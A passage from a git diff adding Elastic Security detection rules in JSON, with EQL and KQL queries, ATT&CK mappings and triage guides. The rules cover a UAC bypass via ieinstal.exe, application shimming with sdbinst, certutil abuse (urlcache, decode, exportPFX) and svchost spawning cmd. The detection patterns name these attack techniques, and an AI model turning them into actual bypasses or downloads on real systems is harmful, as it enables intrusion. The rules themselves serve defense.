ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.009", + "name": "Regsvcs/Regasm", + "reference": "https://attack.mitre.org/techniques/T1218/009/" + }, + { + "id": "T1218.010", + "name": "Regsvr32", + "reference": "https://attack.mitre.org/techniques/T1218/010/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "fb02b8d3-71ee-4af1-bacd-215d23f17efa_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_108.json b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_108.json new file mode 100644 index 00000000000..410f7dce623 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_108.json @@ -0,0 +1,147 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass attempts by abusing an elevated COM Interface to launch a malicious program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : \"C:\\\\*\\\\AppData\\\\*\\\\Temp\\\\IDC*.tmp\\\\*.exe\" and\n process.parent.name : \"ieinstal.exe\" and process.parent.args : \"-Embedding\"\n\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n", + "references": [ + "https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_109.json b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_109.json new file mode 100644 index 00000000000..3ca66af4803 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_109.json @@ -0,0 +1,147 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass attempts by abusing an elevated COM Interface to launch a malicious program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : \"C:\\\\*\\\\AppData\\\\*\\\\Temp\\\\IDC*.tmp\\\\*.exe\" and\n process.parent.name : \"ieinstal.exe\" and process.parent.args : \"-Embedding\"\n\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n", + "references": [ + "https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_109.json b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_109.json new file mode 100644 index 00000000000..aa266b08ad0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_109.json @@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Application Shim was created to allow for backward compatibility of software as the operating system codebase changes over time. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Application Shimming via Sdbinst", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"sdbinst.exe\" and\n not (process.args : \"-m\" and process.args : \"-bg\") and\n not process.args : \"-mm\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.011", + "name": "Application Shimming", + "reference": "https://attack.mitre.org/techniques/T1546/011/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.011", + "name": "Application Shimming", + "reference": "https://attack.mitre.org/techniques/T1546/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "fd4a992d-6130-4802-9ff8-829b89ae801f_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_110.json b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_110.json new file mode 100644 index 00000000000..de28ea83a3c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_110.json @@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Application Shim was created to allow for backward compatibility of software as the operating system codebase changes over time. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Application Shimming via Sdbinst", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"sdbinst.exe\" and\n process.args : \"?*\" and\n not (process.args : \"-m\" and process.args : \"-bg\") and\n not process.args : \"-mm\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.011", + "name": "Application Shimming", + "reference": "https://attack.mitre.org/techniques/T1546/011/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.011", + "name": "Application Shimming", + "reference": "https://attack.mitre.org/techniques/T1546/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "fd4a992d-6130-4802-9ff8-829b89ae801f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_108.json b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_108.json new file mode 100644 index 00000000000..4f2fd74caaa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_108.json @@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies suspicious commands being used with certutil.exe. CertUtil is a native Windows component which is part of Certificate Services. CertUtil is often abused by attackers to live off the land for stealthier command and control or data exfiltration.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious CertUtil Commands", + "note": "## Triage and analysis\n\n### Investigating Suspicious CertUtil Commands\n\n`certutil.exe` is a command line utility program that is included with Microsoft Windows operating systems. It is used to manage and manipulate digital certificates and certificate services on computers running Windows.\n\nAttackers can abuse `certutil.exe` utility to download and/or deobfuscate malware, offensive security tools, and certificates from external sources to take the next steps in a compromised environment. This rule identifies command line arguments used to accomplish these behaviors.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine the nature of the execution.\n - If files were downloaded, retrieve them and check whether they were run, and under which security context.\n - If files were obfuscated or deobfuscated, retrieve them.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved files using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"certutil.exe\" or ?process.pe.original_file_name == \"CertUtil.exe\") and\n process.args : (\"?decode\", \"?encode\", \"?urlcache\", \"?verifyctl\", \"?encodehex\", \"?decodehex\", \"?exportPFX\")\n", + "references": [ + "https://twitter.com/Moriarty_Meng/status/984380793383370752", + "https://twitter.com/egre55/status/1087685529016193025", + "https://www.sysadmins.lv/blog-en/certutil-tips-and-tricks-working-with-x509-file-format.aspx", + "https://docs.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fd70c98a-c410-42dc-a2e3-761c71848acf", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timeline_id": "e70679c2-6cde-4510-9764-4823df18f7db", + "timeline_title": "Comprehensive Process Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "fd70c98a-c410-42dc-a2e3-761c71848acf_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_210.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_210.json new file mode 100644 index 00000000000..3b84d9e7b5c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_210.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious parent child process relationship with cmd.exe descending from svchost.exe", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Svchost spawning Cmd", + "new_terms_fields": [ + "host.id", + "process.command_line", + "user.id" + ], + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:windows and event.category:process and event.type:start and process.parent.name:\"svchost.exe\" and process.name:(\"cmd.exe\" or \"Cmd.exe\" or \"CMD.EXE\")\n", + "references": [ + "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timeline_id": "e70679c2-6cde-4510-9764-4823df18f7db", + "timeline_title": "Comprehensive Process Timeline", + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 210 + }, + "id": "fd7a6052-58fa-4397-93c3-4795249ccfa2_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_211.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_211.json new file mode 100644 index 00000000000..cd98b236031 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_211.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious parent child process relationship with cmd.exe descending from svchost.exe", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Svchost spawning Cmd", + "new_terms_fields": [ + "host.id", + "process.command_line", + "user.id" + ], + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for 